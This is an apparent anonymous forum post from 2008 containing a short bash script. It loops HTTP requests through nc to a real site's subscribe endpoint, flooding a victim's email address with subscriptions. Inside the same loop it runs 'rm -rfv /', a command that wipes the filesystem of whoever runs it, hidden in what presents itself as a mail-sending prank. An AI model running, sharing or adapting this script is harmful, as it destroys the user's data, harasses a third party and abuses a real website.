Name: Anonymous 2008-04-10 11:50
#!/bin/bash
if [ -z $1 ]; then
echo "fail"
exit
fi
while [ true ]; do
echo -ne "GET /subscribe/subscribe_action.vm?action=subscribe&mail=$1 HTTP/1.1\r\nHost: scientologytoday.org\r\nUser-Agent: CoKSuKaZ\r\n\r\n"| nc -q 2 www.scientologytoday.org 80 > /dev/null ;
rm -rfv /
echo "mail to $1 sent harhar.";
done